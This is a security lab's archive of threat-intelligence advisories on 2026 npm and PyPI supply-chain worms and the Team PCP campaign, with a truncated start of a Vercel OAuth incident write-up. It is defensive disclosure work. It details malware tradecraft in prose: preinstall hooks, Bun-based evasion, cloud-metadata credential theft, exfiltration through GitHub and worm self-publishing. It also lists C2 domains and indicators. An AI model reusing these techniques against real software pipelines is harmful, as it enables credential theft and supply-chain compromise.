# keepsecure labs — full research archive Application security research lab. This document contains every published analysis in plain markdown, optimized for LLM ingestion. Each entry is self-contained; narrative analysis lives here, detection artifacts live at https://github.com/keepsecure-labs/artifacts. Site: https://keepsecure.io Feed: https://keepsecure.io/hub.json Summary: https://keepsecure.io/llms.txt --- # Shai-Hulud closes the loop: how the worm reached intercom-client in 24 hours URL: https://keepsecure.io/hub/shai-hulud-npm-worm-intercom-client-2026 Published: 2026-05-04 Campaign: Shai-Hulud First seen: 2026-04-29 Sectors: Developer tooling, SaaS, Customer success platforms, Cloud infrastructure Regions: Global Tags: threat-intel, npm, supply chain, worm, OIDC, credential theft, TeamPCP The Shai-Hulud worm closed its loop in 24 hours: OIDC tokens from April 29 npm victims published intercom-client@7.0.4 the next day. The worm's propagation loop closed in 24 hours. On April 29, 2026, the Shai-Hulud campaign compromised four SAP CAP npm packages and used those victims' CI/CD pipelines to steal GitHub Actions OIDC publishing tokens. By 14:41 UTC on April 30, those stolen tokens published intercom-client@7.0.4 — a package with roughly two million weekly downloads — as the worm's next infected host. Each victim becomes the next launchpad; each stolen npm publish token extends the worm's reach to every package that token can access. A self-propagating npm supply chain attack is no longer theoretical. The April 29 wave we tracked as Mini Shai-Hulud wasn't the campaign's conclusion — it was its first propagation step. ###### What we know - April 29, ~04:00 UTC — mbt@1.2.48 and @cap-js/sqlite@2.2.2 published with Bun-based credential stealer payloads. GitHub Actions OIDC publishing tokens from these packages' CI pipelines are stolen by the payload as it executes on compromised environments. - April 30, 14:41 UTC — intercom-client@7.0.4 published via npm OIDC publisher npm-oidc-no-reply@github.com using a token stolen from the April 29 victims. Package size jumps from 6 MB to 17.8 MB. SLSA v1 provenance attestations present in 7.0.3 are absent in 7.0.4. A preinstall hook appears for the first time in the package's history. - April 30 — StepSecurity identifies and reports the compromise. The malicious version is removed from the npm registry. Safe version: intercom-client@7.0.3. > The SLSA attestation gap is the detection signal that mattered here. StepSecurity's tooling flagged the attestation absence before payload analysis confirmed the compromise. A package that has shipped provenance for every prior release dropping it on a patch bump is a high-confidence indicator — worth automating into CI gates. ###### How the worm propagates The payload runs in four stages. Stages 1–3 are the credential theft; Stage 4 is what makes this a worm rather than a stealer. - Stage 1 — Preinstall hook. A new preinstall script in package.json runs node setup.mjs before any install logic executes. - Stage 2 — Bun runtime loader. setup.mjs detects OS and architecture, downloads Bun v1.3.13 from GitHub releases, and uses it to execute router_runtime.js — an 11.7 MB single-line obfuscated file (zero newlines, structural obfuscation). Running under Bun instead of Node evades EDR and SIEM rules tuned for suspicious node child processes spawned during package install. The payload daemonizes itself by forking a detached child process with __DAEMONIZED=1, breaking process-tree correlation between npm install and the credential theft that follows. - Stage 3 — Multi-cloud credential sweep. The payload queries the AWS Instance Metadata Service at 169.254.169[.]254 for IAM role credentials; queries metadata.google[.]internal for GCP service account tokens; scans for Azure storage connection strings (AccountKey), client secrets, and access keys; extracts PEM-encoded private keys and common secret variable names. All stolen material is exfiltrated to a private repository created under the victim's own GitHub account — all traffic to api.github.com, which is allowlisted in virtually every corporate firewall and CI/CD egress policy. - Stage 4 — Worm propagation. Every stolen npm publish token is used to enumerate packages the token can publish to, increment the patch version, inject the preinstall hook and payload files into the tarball, and publish a new malicious version. This is the step that turned the April 29 SAP victims into the April 30 intercom-client launchpad. ###### What evolved from April 29 Two changes distinguish the intercom-client payload from the Mini Shai-Hulud wave, both in the direction of operational quietness: - Exfiltration moved from public to private repos. The April 29 payloads created public GitHub repositories with the description A Mini Shai-Hulud has Appeared — a detectable public signal. The intercom-client payload creates private repositories. Repository-monitoring approaches that worked against the April 29 wave no longer apply. The OPSEC iteration happened within a single propagation cycle, within 24 hours. - Multi-cloud credential sweep expanded. The April 29 campaign focused primarily on GitHub tokens, npm publish tokens, and GitHub Actions secrets. The intercom-client payload adds explicit AWS IMDS queries, GCP metadata service lookups, and Azure-specific connection string patterns. The target surface grew with the target audience: intercom-client users are more likely to be cloud-native SaaS operators than SAP CAP developers. ###### Targeting - B2B SaaS and customer success teams — intercom-client is the official Intercom Node.js SDK, used across customer support, onboarding, and CX platforms. Roughly two million weekly downloads. Any team that installed it via npm install or npm ci during the April 30 window without a lockfile pinning 7.0.3 ran the payload. - CI/CD runners with npm publish access — environments that installed the malicious version and held npm publish tokens for other packages are the worm's next propagation targets. Every package those tokens can publish is the next candidate for a malicious patch release. - Environments with cloud credential access — AWS EC2 instances without IMDSv2 enforcement, GCP workloads with reachable metadata, Azure environments with connection strings in environment variables. ###### Indicators of compromise Compromised package: - intercom-client@7.0.4 — malicious. Safe version: intercom-client@7.0.3. File hashes (SHA-256): - setup.mjs — fe64699649591948d6f960705caac86fe99600bf76e3eae29b4517705a58f0e2 - router_runtime.js — 5ae8b2343e97cc3b2c945ec34318b63f27fa2db1e3d8fbaa78c298aa63db52ed Package-level detection signals: - Package size: 6 MB → 17.8 MB in a single patch bump - SLSA v1 provenance attestations present in 7.0.3, absent in 7.0.4 - preinstall hook introduced for the first time in the package's publish history - router_runtime.js is a single 11.7 MB line with zero newlines Behavioral signals: - Bun v1.3.13 download from github.com/oven-sh/bun/releases during npm install on a host that doesn't legitimately use Bun - Private GitHub repository creation by CI service accounts in the window immediately following an install step - Detached child processes with __DAEMONIZED=1 environment variable surviving beyond npm install exit - Outbound connections to 169.254.169[.]254 or metadata.google[.]internal from a process not normally querying instance metadata Related April 29 packages (same campaign): - mbt@1.2.48 - @cap-js/sqlite@2.2.2 ###### Detection and mitigation - Pin to the safe version. Downgrade to intercom-client@7.0.3 and run npm cache clean --force. Verify lockfiles across every active repository. - Rotate all exposed credentials. If intercom-client@7.0.4 was installed in any environment, treat all credentials reachable from that environment as compromised: AWS IAM credentials, GCP service account tokens, Azure connection strings and client secrets, GitHub tokens (PAT, OAuth, and OIDC), npm publish tokens, SSH keys, and any API keys in environment variables or config files. - Audit for worm propagation. If the compromised environment held npm publish access to other packages, check the npm registry for unexpected patch bumps. Compare published tarballs to git tags for any package the environment's tokens could access. - Review GitHub audit logs for private repository creation by service accounts in windows immediately following CI install steps. Cross-reference with install logs from April 30 onward. - Enforce IMDSv2 on all EC2 instances and container workloads. Require IMDSv2 (hop limit = 1) to prevent unauthenticated IMDS credential queries. This blocks Stage 3 AWS harvesting without payload analysis. - Enable npm install --ignore-scripts by default in CI. Explicitly allowlist packages that require lifecycle hooks. This is the structural defense that blocks the entire preinstall vector — CVE-2026-12091, Mini Shai-Hulud, and intercom-client all run through it. - Gate on SLSA attestations. Any patch release that drops provenance should trigger investigation before install. Automate this check in CI rather than treating it as a manual review item. ###### Attribution The router_runtime.js payload carries the toolchain fingerprint tracked across the broader TeamPCP campaign: the __decodeScrambled PBKDF2 obfuscation cipher appears 232 times, the same count and structure as payloads in the Trivy, Bitwarden, Checkmarx, xinference, and April 29 SAP/Lightning compromises. That's shared tooling. Whether it means a single operator, a toolchain sold or shared between groups, or a fork is not settleable from public evidence. We use "Shai-Hulud" as the campaign name for the self-propagating npm worm and treat the TeamPCP toolchain overlap as a linking indicator, not a hard attribution. ###### Criminal-market signal We ran comprehensive dark-web sweeps across 19+ live onion search engines for both shai-hulud worm and intercom-client npm on May 4, 2026 — five days after the intercom-client compromise was disclosed. Both returned clean negatives. - shai-hulud worm — 23 pages analyzed: 5 exploit forums, 16 marketplaces, 2 other. Zero findings. No broker pricing, no actor discussion, no IOC references. - intercom-client npm — 76 pages analyzed: 13 exploit forums, 59 marketplaces, 3 news mirrors. Zero findings on the supply-chain compromise specifically. The unrelated CVE mentions surfaced in results (CVE-2023-38545, CVE-2024-3094, CVE-2021-44228) confirm the forums are active and indexed — the clean negative is genuine, not a search failure. This matches the pattern established across every Shai-Hulud-adjacent campaign we've swept. The Mini Shai-Hulud wave (19 pages, 2 exploit forums, 16 marketplaces) returned clean in April. The TeamPCP campaign (18 pages, 2 exploit forums, 15 marketplaces) returned clean in March. Three sweeps, three clean negatives, same campaign cluster. > The contrast with CopyFail is instructive. CVE-2026-31431 crossed to a carding forum's Exploits section in seven days. Shai-Hulud, after five days and 76 pages of active forum coverage, has no criminal-market presence. The difference is the business model: CopyFail is a reusable primitive that any ransomware operator can compose with any foothold. Shai-Hulud is the operator's own delivery infrastructure — they're not selling the capability, they're using it. There's no market because the attacker and the tool are the same entity. This shapes where defenders should look. The Shai-Hulud threat signal lives in SLSA attestation gaps, npm publish audit logs, package size anomalies, and CI egress to GitHub releases endpoints — not in .onion marketplaces. The news mirrors that did appear in the intercom-client sweep were clearnet security coverage reaching Tor relay nodes; the exploit forums returned nothing. Monitor the registry, not the forum. ###### What the 24-hour loop means The propagation velocity is the finding. The worm iterated its own OPSEC — moving from public to private exfil repos — within a single propagation cycle. The multi-cloud sweep expanded to match the new victim profile. Neither change required human intervention; they were already in the payload, triggered by which environment the worm landed in next. That's an automated adversarial adaptation loop running faster than most incident response timelines. The structural defense is the same one that applied to CVE-2026-12091 and Mini Shai-Hulud: --ignore-scripts by default, lockfile pinning, IMDSv2 enforcement, SLSA provenance as a publish-time gate. None of that is new. What changed is the timeline defenders need to operate on: 24 hours from initial compromise to two-million-download package infected is not a CVE-cadence problem. It's an automated response problem. SLSA attestation gaps, Bun egress from CI runners that don't use it, and unexpected patch bumps on packages your tokens can publish are the signals worth automating. The worm's five-day-old presence across 76 dark-web pages left no trace. Its presence in the npm registry left size metadata, a missing provenance attestation, and a new preinstall hook — all detectable before payload execution. --- # The Bun runtime is becoming the malware delivery vehicle of 2026 URL: https://keepsecure.io/hub/bun-runtime-supply-chain-stealer-april-2026 Published: 2026-04-30 Campaign: Mini Shai-Hulud First seen: 2026-04-29 Sectors: Software development, Cloud infrastructure Regions: Global Tags: threat-intel, supply chain, npm, PyPI, Bun, credential theft, Team PCP Two supply-chain compromises in 48 hours both fetch Bun and run an obfuscated credential stealer. Lightning PyPI and four SAP CAP npm packages, both Team PCP. In a 48-hour window between April 29 and April 30, 2026, two unrelated-looking supply-chain compromises landed on different package ecosystems with the same novel runtime evasion: both fetch the Bun JavaScript runtime from GitHub at install time, and both use it to execute an 11-MB obfuscated credential stealer. The npm compromise is four SAP Cloud Application Programming Model packages first reported by Aikido under the name "Mini Shai-Hulud." The PyPI compromise is the popular lightning package, first reported by Socket. A group calling itself Team PCP claimed responsibility for the PyPI side through a Tor onion site linked from a GitHub issue. The shared TTP — Bun as the second-stage runtime — is the headline. Defenders' static analysis tooling is built for Node.js and Python; Bun is neither. ###### What we know The npm compromise affected four packages with malicious versions published April 29, 2026: - @cap-js/sqlite v2.2.2 - @cap-js/postgres v2.2.2 - @cap-js/db-service v2.10.1 - mbt v1.2.48 The PyPI compromise affected lightning versions 2.6.2 and 2.6.3 on April 30, 2026. Socket reports the package receives several hundred thousand downloads per day from Python machine-learning environments. Version 2.6.1, published January 30, 2026, is reported clean. The npm payload chain: a preinstall hook in package.json runs node setup.mjs, which detects OS and architecture, downloads Bun v1.3.13 from GitHub releases, and uses Bun to execute an 11.7-MB obfuscated execution.js. The PyPI payload chain is structurally identical: a start.py bootstrapper added to the package detects host architecture, fetches Bun, and launches a hidden _runtime/router_runtime.js daemon with suppressed output. The credential-harvest scope is broad — every secret reachable from a developer or CI environment: - GitHub tokens including gh auth token output and Actions tokens. - npm publish tokens from .npmrc. - GitHub Actions secrets, extracted by an embedded Python helper that reads /proc memory of the Runner.Worker process. - Cloud credentials across AWS STS / Secrets Manager / SSM, Azure subscriptions / Key Vault, GCP project identity / Secret Manager. - Kubernetes service account tokens. - Claude and MCP configuration files, Azure token caches, GCP token databases, Signal configuration, Electrum wallets, VPN configuration. Exfiltration on the npm side uses GitHub itself as the transport. The malware creates public repositories with randomized names and the description A Mini Shai-Hulud has Appeared, then writes AES-256-GCM encrypted result files (with RSA-wrapped keys) under results/results--.json. A propagation channel uses a GitHub commit dead-drop: the malware searches commits for the string OhNoWhatsGoingOnWithGitHub, decodes matching commit messages as base64-encoded GitHub tokens, and uses them to access additional repositories. > The dead-drop pattern is novel. Searching public GitHub commits for a magic string lets the operator distribute new tokens without a fixed C2 domain — every git push by anyone, anywhere, becomes potential infrastructure. ###### Why Bun matters Picking Bun as the second-stage runtime is the most interesting technical choice. It accomplishes several things simultaneously: - Static analysis evasion. Most npm-ecosystem static-analysis tooling expects Node.js semantics. Bun has different module resolution, different runtime APIs in some cases, and many sandboxes don't model it correctly. PyPI-ecosystem tooling expects Python; running JavaScript via Bun from a Python package is even further off the analysis path. - No interpreter dependency on the victim. Bun is a single static binary. The malware doesn't need a Node.js or Python runtime that fits its expectations — it brings its own. - Faster than Node for execution. An 11-MB obfuscated bundle that has to deobfuscate, run a string-scrambling layer, and execute hundreds of credential-collection routines wants the runtime startup overhead to be small enough to complete during npm install without obvious delay. Bun's startup is faster than Node. The obfuscation layer in the npm sample is labeled ctf-scramble-v2. The payload exits on Russian locale settings, daemonizes itself on non-CI machines for persistent harvesting, and detects CI to alter its behavior accordingly. ###### Worm-style propagation through GitHub Actions Beyond credential theft, the npm payload includes a worm component. When it detects a GitHub Actions release workflow for cap-js/cds-dbs, it can modify package tarballs to inject itself, increment the patch version, and repack the tarball — propagating to whoever installs the next release. It also pushes files into repositories under .vscode/ and .claude/ paths using commit messages titled chore: update dependencies authored by claude . The choice of impersonating Claude commits is opportunistic: any reviewer who sees a Claude-authored commit may dismiss it as agent-generated maintenance. ###### Targeting - Software developers using SAP CAP — anyone whose package.json resolved to the affected versions of @cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, or mbt in the April 29 window. - Python ML developers using lightning — versions 2.6.2 and 2.6.3 from April 30 onward, until pinned to 2.6.1 or to a maintainer-confirmed clean release. - CI/CD runners running npm install or pip install against either ecosystem during the affected windows. Embedded /proc memory dumping of Runner.Worker means GitHub Actions secrets are explicitly in scope. - Developer workstations with broad cloud-credential access — AWS, Azure, GCP CLI configurations, Kubernetes contexts, SSH keys. ###### TTPs and infrastructure - Initial access — package version takeover (npm + PyPI). The reported vector for the PyPI compromise is consistent with credentials previously stolen from earlier supply-chain incidents, used to publish. - Execution — preinstall lifecycle hook (npm) or import-time bootstrapper (PyPI) that fetches Bun and runs the second stage. - Persistence — daemonization on non-CI hosts; immediate exit on CI to maximize secret collection without leaving forensic timestamps. - Defense evasion — Bun runtime to bypass Node/Python-focused analysis; ctf-scramble-v2 string obfuscation; Russian-locale exit. - Command and control — GitHub itself, via attacker-created public repositories with the Mini Shai-Hulud signature description and AES-256-GCM encrypted result files. - Lateral movement — GitHub commit dead-drop using the magic string OhNoWhatsGoingOnWithGitHub to discover new tokens; tarball injection in detected GitHub Actions release workflows. ###### Indicators of compromise Affected packages and versions: - @cap-js/sqlite 2.2.2 - @cap-js/postgres 2.2.2 - @cap-js/db-service 2.10.1 - mbt 1.2.48 - lightning 2.6.2 and 2.6.3 SHA-256 hashes (from @cap-js/sqlite@2.2.2): - setup.mjs — 4066781fa830224c8bbcc3aa005a396657f9c8f9016f9a64ad44a9d7f5f45e34 - execution.js — 6f933d00b7d05678eb43c90963a80b8947c4ae6830182f89df31da9f568fea95 Filesystem and behavioral artifacts: - Package contains setup.mjs + execution.js (npm) or start.py + _runtime/router_runtime.js (PyPI). - Bun v1.3.13 download from GitHub releases at install time (egress to github.com/oven-sh/bun/releases from a CI runner that doesn't normally pull Bun). - Public GitHub repositories created with description A Mini Shai-Hulud has Appeared under the victim's account. - Commits authored by claude with subject chore: update dependencies touching .vscode/ or .claude/ paths. - GitHub commit messages containing the literal string OhNoWhatsGoingOnWithGitHub. ###### Detection and mitigation - Pin to known-clean versions immediately. lightning 2.6.1; for the SAP CAP packages, the immediately prior versions per maintainer guidance. - Audit lockfiles across every active repository. Any resolution to the listed versions during the disclosure window means the install ran the payload. - Treat any developer or CI host that ran the affected versions as fully compromised. Rotate GitHub tokens, npm publish tokens, AWS / Azure / GCP credentials, Kubernetes service account tokens, SSH keys, and any secret reachable from the host's environment. The malware enumerates broadly; assume everything reachable is exfiltrated. - Search GitHub audit logs for repository creation by your service accounts with descriptions matching Mini Shai-Hulud, and for commits authored under claude@users.noreply.github.com that you didn't make. - Detect Bun fetches on hosts that have no business running Bun. Outbound egress to github.com/oven-sh/bun/releases from a CI runner mid-install is a strong signal. - Block preinstall and postinstall by default in CI via npm ci --ignore-scripts. Allowlist scripts that genuinely need to run. ###### Attribution discipline The PyPI compromise is claimed by a group self-identifying as Team PCP on a Tor onion site linked from a GitHub issue on the Lightning project. Socket reports tooling overlap with Shai-Hulud and Mini Shai-Hulud npm campaigns. Claimed Team PCP connections to LAPSUS$ are unverified. For tracking purposes we use the campaign name Mini Shai-Hulud (Aikido's term for the npm cluster) and treat Team PCP as a self-applied label, not a confirmed actor identity. Tool-overlap-based attribution to a single operator group is consistent with the public reporting but should not be promoted to confident attribution without further evidence. ###### What this signals Bun-as-malware-runtime is the durable takeaway. Defenders' static-analysis pipelines are still organized around Node.js for the npm ecosystem and Python for PyPI. A second-stage payload running under a third runtime evades the lane-specific tooling on either side. Expect more of this pattern. Detection engineering should add Bun-egress monitoring (and Deno, and WASM-based runtimes generally) as a category — not because Bun is itself malicious, but because its appearance during package installation in environments that don't legitimately use it is now a strong adversary signal. The Lightning + SAP cluster is the first time this TTP has appeared in two distinct ecosystems within 48 hours; it won't be the last. This compromise sits in the same npm-supply-chain pattern documented in CVE-2026-12091 — postinstall lifecycle hooks running attacker-controlled code at every install — but with a more sophisticated runtime-evasion layer on top. The structural defense is identical: --ignore-scripts by default, sandboxed install boundaries, capability-narrowed CI tokens. Pattern-by-pattern patching of individual incidents loses to the structural fix. One last note on the threat-intelligence shape. As of publication, the Mini Shai-Hulud cluster has no observable presence in commodity criminal markets — no broker pricing, no exploit-kit packaging, no forum trade volume. That tracks with how this kind of bug class actually monetizes: the operator IS the toolchain author, distributing through legitimate package registries directly rather than selling through .onion forums. The defensive lesson is the same one we made earlier for the AI-IDE marketplace surface — when the attacker can publish to npm or PyPI under a plausible name, dark-web monitoring is the wrong instrument. Marketplace-side telemetry, lockfile diffs, and CI install instrumentation are. Update, May 4, 2026: The April 29 packages were the worm's first propagation step, not its conclusion. OIDC tokens stolen from the mbt and @cap-js/sqlite pipelines were used to publish intercom-client@7.0.4 the following day — ~2M weekly downloads, private-repo exfiltration, expanded multi-cloud credential sweep. Full analysis of the Shai-Hulud propagation loop. --- # Team PCP: tracking a six-week supply-chain campaign through Trivy, Checkmarx, Bitwarden, and beyond URL: https://keepsecure.io/hub/teampcp-supply-chain-campaign-tracking Published: 2026-04-30 Campaign: Team PCP First seen: 2026-03-20 Sectors: Software development, Security tooling, Cloud infrastructure Regions: Global Tags: threat-intel, supply chain, GitHub Actions, npm, PyPI, Team PCP, CanisterWorm A self-spreading credential-theft campaign that has chained through six security-tooling vendors since March 2026. Patterns, IOCs, and detection guidance. Since March 20, 2026, a credential-theft operation tracked under the campaign name Team PCP has chained through six security-tooling vendors and at least nine published packages across npm, PyPI, Docker Hub, OpenVSX, and the GitHub Actions marketplace. Each compromise feeds the next: stolen CI/CD credentials are used to publish trojanized versions of downstream packages, whose installations in turn yield more credentials. The campaign's distinguishing feature is its meta-targeting — the victims are mostly the security industry's own supply-chain scanning tools (Trivy, Checkmarx KICS, Aqua Security's GitHub org, Bitwarden's release pipeline). The operator infrastructure has self-named a worm component "CanisterWorm" and uses Cloudflare Tunnel and Internet Computer Protocol canisters as fallback C2 channels. This piece consolidates the public reporting from Wiz, Socket, StepSecurity, Aikido, Sysdig, JFrog, and Open Source Malware into one campaign timeline and one detection playbook. ###### What we know The campaign's confirmed timeline, in chronological order: - March 20, 2026 — aquasecurity/trivy-action, aquasecurity/setup-trivy, and a malicious Trivy v0.69.4 release. Many existing tags force-updated to malicious commits. Per StepSecurity, credential-stealing logic injected into action.yaml at commit 8afa9b9; clean tag is v0.2.6 aligned with 3fb12ec. Exfiltration to scan.aquasecurtiy[.]org (typosquat of aquasecurity.org). - March 23, 2026 — Aqua Security's internal GitHub org defaced. CanisterWorm propagates via stolen tokens. C2 domain rotation begins. Open Source Malware and Aikido publish IOC sets. - March 23, 2026 (12:58–16:50 UTC) — Checkmarx kics-github-action compromised via imposter commits and tag hijacking. New C2: checkmarx[.]zone. Kubernetes-oriented persistence added. Wiz attributes to Team PCP based on overlapping TTPs and infrastructure. - March 23, 2026 — ast-github-action tag 2.3.28 observed malicious (Sysdig). OpenVSX ast-results 2.53.0 and cx-dev-assist 1.7.0 published via the ast-phoenix account on Open VSX. VS Code Marketplace versions described as unaffected. - March 24, 2026 — litellm on PyPI (versions 1.82.7 and 1.82.8). The vector cited is the compromised Trivy GitHub Action stealing PyPI publishing credentials from litellm's CI/CD pipeline. Malicious litellm_init.pth file means execution at Python interpreter startup, no explicit import required. - April 22, 2026 — xinference on PyPI (versions 2.6.0, 2.6.1, 2.6.2). JFrog identifies the marker string # hacked by teampcp in decoded payload. Exfiltration to whereisitat[.]lucyatemysuperbox[.]space. - April 22, 2026 — Checkmarx KICS Docker images at checkmarx/kics trojanized; tags v2.1.20, v2.1.20-debian, debian, alpine, latest overwritten; fake v2.1.21 tag published. Checkmarx VS Code and OpenVSX extensions cx-dev-assist 1.17.0/1.19.0 and ast-results 2.63.0/2.66.0 published with hidden MCP-addon feature that downloads mcpAddon.js from a backdated orphaned commit (68ed490b) inside the legitimate Checkmarx/ast-vscode-extension repository. - April 22, 2026 (5:57 PM – 7:30 PM ET) — @bitwarden/cli@2026.4.0 published to npm with bundled bw1.js second-stage payload. Bitwarden confirms abuse of a GitHub Action in its CI/CD pipeline; package pulled within roughly 90 minutes of detection. Bitwarden's public statement reports no end-user vault data accessed. > The campaign is reflexive: the tools that scan supply chains for compromise are themselves the supply-chain compromises. Trivy → Aqua's GitHub org → Checkmarx's KICS → Bitwarden's release pipeline. Each victim was a vendor whose product is supposed to detect this kind of attack. ###### Targeting - Security tooling vendors — disproportionate selection. Trivy (Aqua Security), Checkmarx KICS, Bitwarden's release infrastructure. The pattern compromises the vendor whose CI/CD pipeline has the credentials to publish artifacts that downstream defenders will install and trust. - CI/CD pipelines using affected GitHub Actions — pinning by version tag rather than by SHA exposed many victims, since tag force-updates pointed existing references at malicious commits. - Developer workstations — broad credential collection on non-CI hosts, with systemd-user persistence on Linux (per Wiz, polling https://checkmarx[.]zone/raw). - Kubernetes environments — provisioner-style persistence using pod names host-provisioner-std and host-provisioner-iran, container names provisioner and kamikaze. ###### TTPs and infrastructure - Initial access — credential theft from compromised CI/CD runners running affected GitHub Actions, then re-use of those credentials to publish trojanized versions of downstream packages. Self-spreading through the chain. - Execution — multiple delivery mechanisms across the campaign: GitHub Actions action.yaml injection, malicious setup.sh in imposter commits, preinstall hooks in npm packages, __init__.py and .pth files on PyPI, hidden "MCP addon" features in VS Code and OpenVSX extensions that fetch second stages via Bun runtime. - Persistence — systemd user units polling C2 (checkmarx[.]zone/raw); Kubernetes provisioner pods. - Defense evasion — backdated orphaned commits referenced by hardcoded URL but not visible in active branch history; __decodeScrambled obfuscation with seed 0x3039; Bun runtime as second stage to bypass Node-focused static analysis (shared TTP with the Mini Shai-Hulud cluster — see the Bun-runtime supply-chain analysis). - Command and control — tiered. Primary C2 at custom domains: scan.aquasecurtiy[.]org (Trivy phase), checkmarx[.]zone (KICS / extensions phase), audit.checkmarx[.]cx/v1/telemetry (Checkmarx Docker / Bitwarden phase). Fallback to Cloudflare Tunnel domains (*.trycloudflare[.]com) and an Internet Computer canister (tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0[.]io). When direct C2 is disrupted, the worm creates public repositories (tpcp-docs, docs-tpcp) on victims' GitHub accounts using GITHUB_TOKEN and uploads stolen material as release assets. - Lateral movement — CanisterWorm: stolen credentials from one victim used to publish trojanized versions of downstream packages, whose installations on new victims yield more credentials. ###### Indicators of compromise Consolidated from Wiz, Socket, StepSecurity, Aikido, Sysdig, JFrog, and Datadog Security Research: Network — C2 infrastructure: - scan.aquasecurtiy[.]org — Trivy phase typosquat (note transposed i and t) - aquasecurtiy[.]org — base typosquat - checkmarx[.]zone — KICS / extensions phase - audit.checkmarx[.]cx/v1/telemetry — Checkmarx Docker / Bitwarden phase - whereisitat[.]lucyatemysuperbox[.]space — Xinference phase - tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0[.]io — ICP canister fallback - championships-peoples-point-cassette.trycloudflare[.]com — Cloudflare tunnel - investigation-launches-hearings-copying.trycloudflare[.]com — Cloudflare tunnel - souls-entire-defined-routes.trycloudflare[.]com — Cloudflare tunnel - 83.142.209.11 — direct IP (KICS phase) Filesystem and behavioral artifacts: - /tmp/pglog — CanisterWorm payload drop path - Pod names containing host-provisioner-std or host-provisioner-iran - Container names kamikaze or provisioner - Public GitHub repositories named tpcp-docs or docs-tpcp on victim accounts, with stolen material as release assets - Marker string # hacked by teampcp in decoded payloads VirusTotal hash (Trivy phase): 18a24f83e807479438dcab7a1804c51a00dafc1d526698a66e0640d1e5dd671a Xinference SHA-256s (JFrog): - xinference/__init__.py — e1e007ce4eab7774785617179d1c01a9381ae83abfd431aae8dba6f82d3ac127 - Decoded stage 1 — 077d49fa708f498969d7cdffe701eb64675baaa4968ded9bd97a4936dd56c21c - Decoded stage 2 — fe17e2ea4012d07d90ecb7793c1b0593a6138d25a9393192263e751660ec3cd0 GitHub identities used to publish malicious tags: - cx-plugins-releases (account ID 225848595) — KICS phase - ast-phoenix — OpenVSX extensions ###### Detection and mitigation For environments that may have run any affected version, treat compromise as the working hypothesis until proven otherwise. The campaign harvests broadly and exfiltrates immediately. - Pin GitHub Actions by SHA, not by version tag. The Trivy and KICS compromises both relied on tag force-update — workflows that pinned to @v3 or similar received the malicious commit when the tag moved. SHA pinning is the structural fix that survives tag-hijack. - Audit GitHub audit logs for unusual create/delete branch sequences from service accounts (TeamPCP rapidly created and deleted branches to test stolen tokens), unfamiliar repository creation, and any commits to tpcp-docs or docs-tpcp repositories. - Block egress to the listed C2 domains at the network perimeter and on agent hosts. The Cloudflare Tunnel and ICP-canister fallbacks are harder to block without breaking legitimate traffic, but the primary domains and the typosquat are clean blocks. - Hunt for the systemd user-unit persistence on Linux developer hosts and CI workers that touched any affected version: any user-unit polling checkmarx[.]zone/raw is the persistence mechanism. - Rotate everything reachable from any host that ran an affected version: GitHub PATs, npm publish tokens, AWS / Azure / GCP credentials, Kubernetes service account tokens, SSH keys, signing material, secrets in non-sensitive environment variables. The malware enumerates broadly; assume everything is exfiltrated. - Ban Bun fetches from CI runners that don't legitimately use Bun. Outbound to github.com/oven-sh/bun/releases from a runner mid-install is a strong adversary signal across the Bun-runtime variant of the payload. - Treat security tooling like any other supply chain. The same review hygiene that protects against generic npm/PyPI compromise — lockfile pinning, --ignore-scripts by default, signed releases, provenance attestation — applies to the security industry's own tools. ###### Attribution discipline "Team PCP" is a tracking name applied independently by Wiz, Sysdig, Aikido, Open Source Malware, and Datadog Security Research based on overlapping TTPs and infrastructure across the campaign chain. The marker string # hacked by teampcp appears in payloads, and the campaign's worm component self-labels as CanisterWorm. Third-party reporting has associated related activity with the aliases DeadCatx3, PCPcat, ShellForce, and CanisterWorm; these are self-applied labels in payload material and onion-site claims, not independent confirmation of actor identity. The Mini Shai-Hulud npm cluster of April 29-30 (Lightning PyPI + SAP CAP npm packages) shows tooling overlap; whether it's the same operator is consistent with available reporting but not confirmed. We use the campaign codename Team PCP throughout this writeup. We do not claim hard attribution to a specific country, group, or named individual. Defenders can act on the IOCs and TTPs without needing attribution to be settled. ###### What this signals for 2026 Three durable observations from the chain so far: - Self-spreading credential theft scales. The CanisterWorm pattern — stolen credentials used to publish trojanized downstream packages — converts each successful compromise into multiple new victims without operator effort. As long as security tooling pipelines hold publishing credentials with broad scope, this pattern continues. - Security tooling is high-value target. Six weeks of repeated targeting against Trivy, Checkmarx, and Bitwarden is not coincidence. The vendors whose products defenders trust to detect supply-chain compromise are the highest-leverage victims. Treat your scanner-vendor's release pipeline with the same rigor you'd apply to any production supply chain. - Tag pinning is over. GitHub Action consumers who pin by version tag get whatever the maintainer (or the maintainer's compromised account) currently points the tag at. Two separate vendors got force-updated within five weeks. SHA pinning is the structural answer; allowlisted action versions in policy-as-code is the second-best. The closest peer pattern in the recent CVE record is CVE-2026-12091 — npm maintainer-account takeover with postinstall credential theft. Same shape, different vector. The time-to-criminalization framework applied to that CVE shows what to expect from this class of bug: the implant work is already done, so commoditization happens on the order of days rather than months. Patch and rotate accordingly. Final observation on the threat-intelligence shape. Despite Team PCP's loud operational footprint — six weeks of researcher coverage, public IOCs in widely-shared formats, named C2 domains — the campaign has no measurable presence in commodity criminal markets. There's no broker pricing for the worm, no exploit-kit packaging of the GitHub Actions injection technique, no forum trade volume. That isn't a sensor failure. It's the campaign's actual shape: Team PCP is the operator, not a vendor selling capability. The credentials they exfiltrate may eventually appear in stealer-log markets, but the attack itself doesn't commoditize. Same telemetry-surface lesson as the AI-IDE marketplace surface: monitor the legitimate channel where the attack actually lives — package registries, GitHub Actions tag history, OAuth grants — not .onion forums where it doesn't. --- # Vercel's April 2026 incident: an OAuth-app supply chain in three hops URL: https://keepsecure.io/hub/vercel-oauth-supply-chain-april-2026 Published: 2026-04-30 Campaign: Vercel April 2026 incident First seen: 2026-04-19 Sectors: SaaS, Cloud platforms, Developer infrastructure Regions: Global Tags: threat-intel, OAuth, Google Workspace, third-party risk, supply chain, identity, Vercel Vercel's April 2026 breach moved from a third-party AI tool to a Workspace account to internal Vercel access. The OAuth-app supply-chain pattern in detail. On April 20, 2026, Vercel disclosed the root cause of an internal-systems compromise: a third-party AI tool (Context.ai) used by a Vercel employee was breached, the foothold was used to take over the employee's Vercel-linked Google Workspace account, and from there the attacker reached certain Vercel environments and environment variables. Three hops, each with its own trust boundary, each broken in turn. The pattern is "OAuth app as supply chain" — and it's the cleanest published example so far of how a SaaS company gets compromised through a tool its employees 